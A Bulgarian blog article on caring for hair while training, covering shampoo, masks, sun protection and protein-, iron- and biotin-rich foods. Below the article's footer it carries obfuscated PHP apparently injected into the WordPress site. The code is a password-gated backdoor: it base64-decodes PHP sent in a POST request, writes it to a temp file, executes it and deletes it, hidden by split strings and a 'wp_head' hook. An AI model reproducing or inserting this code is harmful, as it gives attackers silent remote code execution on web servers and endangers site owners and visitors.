Как да се грижим за косата, когато тренираме | Косопад

Как да се грижим за косата, когато тренираме

Спортистите и хората, които тренират, трябва да внимават с храненето, за да избегнат проблеми с косата.

спорт

Храната за спортистите е решаваща за доброто здраве на косата, особено при тези от тях, които имат много интензивни тренировки и се готвят за състезание.

Косата е сред най- бързо замърсяващите се части по тялото. Освен това е богата на потни и себорейни жлези. Затова трябва често да я миете с качествен шампоан, съобразен с типа коса.

Ако шампоанът ви е подходящ, не е необходимо да го сменяте. Не е вярно, че трябва да го редуваме с друг продукт, тъй като е много възможно да причиним  рН дисбаланс.

Ако тренирате интензивно, е желателно да си правите хидратиращи и подхранващи маски след къпане, за даспорт1 възстановите косата след излагането на агресивни фактори като слънце, пот, хлор и др. Слагането на шапка, когато тренирате навън, също е полезно.

Слънцето помага за растежа на косата ,но когато е много силно, започва да вреди. Трябва да се замислим за скалпа си, който няма тен като останалите части на тялото ни. Затова слагайте шапка, за да не увредите кожата на главата.

За професионалните спортисти и интензивно трениращите допълнителният прием на витамини е жизненоважен за здравето на косата. Косата, като всеки друг орган, има високи биологични изисквания, и при ускорен метаболизъм, има нужда от допълнителни вещества. Затова, трябва да се храним здравословно и балансирано, за да избегнем косопада и да имаме силна коса.

Храните, богати на протеини, като мляко, яйца, риба, както и богатите на желязо, като месото, ядките и зехтина, са задължителни. Също и пълнозърнестите, които съдържат биотин. Наблегнете и на зеленчуците, които са богати на фолиева киселина.

07. януари 2014 18:33:33 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}